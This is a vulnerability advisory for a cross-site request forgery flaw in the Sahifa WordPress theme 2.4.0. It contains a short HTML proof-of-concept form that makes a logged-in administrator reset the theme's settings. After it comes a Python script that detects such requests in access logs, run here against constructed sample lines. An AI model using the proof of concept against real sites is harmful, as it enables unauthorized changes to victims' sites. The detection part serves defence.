Author: Dr.AFN[D]ENA, Published: 19-01-2015
The Sahifa theme for WordPress is prone to multiple cross-site request forgery (CSRF) vulnerabilities because the application fails to properly validate HTTP requests.
Exploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
Sahifa 2.4.0 is vulnerable; other versions may also be affected.
<h1>Wordpress sahifa theme CSRF exploit By Dr.AFN[D]ENA<br></h1>
<form method="post" action="http://local/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit" value="Reset Settings" />-->
</form>
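For defenders, the request above leaves a recognisable trace in web server access logs: a POST to the theme panel URL with reset=true whose Referer is not the site itself. The following detection sketch is an added example, not part of the original advisory or the theme's code; the host name blog.example, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format: request line, status, size, Referer, User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def is_panel_reset(target):
    """True if the request target is the theme panel reset URL shown in the PoC."""
    url = urlsplit(target)
    qs = parse_qs(url.query)
    return (url.path.endswith("/wp-admin/admin.php")
            and qs.get("page") == ["panel"]
            and qs.get("reset") == ["true"])

def suspicious_resets(lines, site_host):
    """Return (timestamp, client_ip, reason) for reset POSTs not referred by site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_panel_reset(m["target"]):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            hits.append((m["ts"], m["ip"], "missing Referer"))
            continue
        host = (urlsplit(referer).hostname or "").lower()
        if host != site_host.lower():
            hits.append((m["ts"], m["ip"], "cross-origin Referer: " + host))
    return hits

# Constructed sample lines (not real traffic); blog.example is an assumed site host.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Jan/2015:10:01:02 +0000] "POST /wp/wp-admin/admin.php?page=panel&reset=true HTTP/1.1" 302 0 "http://blog.example/wp/wp-admin/admin.php?page=panel" "Mozilla/5.0"',
    '203.0.113.20 - - [19/Jan/2015:10:05:40 +0000] "POST /wp/wp-admin/admin.php?page=panel&reset=true HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '203.0.113.21 - - [19/Jan/2015:10:07:11 +0000] "POST /wp/wp-admin/admin.php?page=panel&reset=true HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.22 - - [19/Jan/2015:10:09:00 +0000] "GET /wp/wp-admin/admin.php?page=panel HTTP/1.1" 200 5120 "http://other.example/" "Mozilla/5.0"',
    '203.0.113.23 - - [19/Jan/2015:10:12:30 +0000] "POST /wp/wp-admin/admin.php?page=panel HTTP/1.1" 200 5120 "http://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_resets(SAMPLE_LOG, "blog.example"):
        print(hit)
```

A missing Referer is a weaker signal than a cross-origin one, since some browsers and proxies strip the header. Access logs do not record the POST body, so the match is on the URL only.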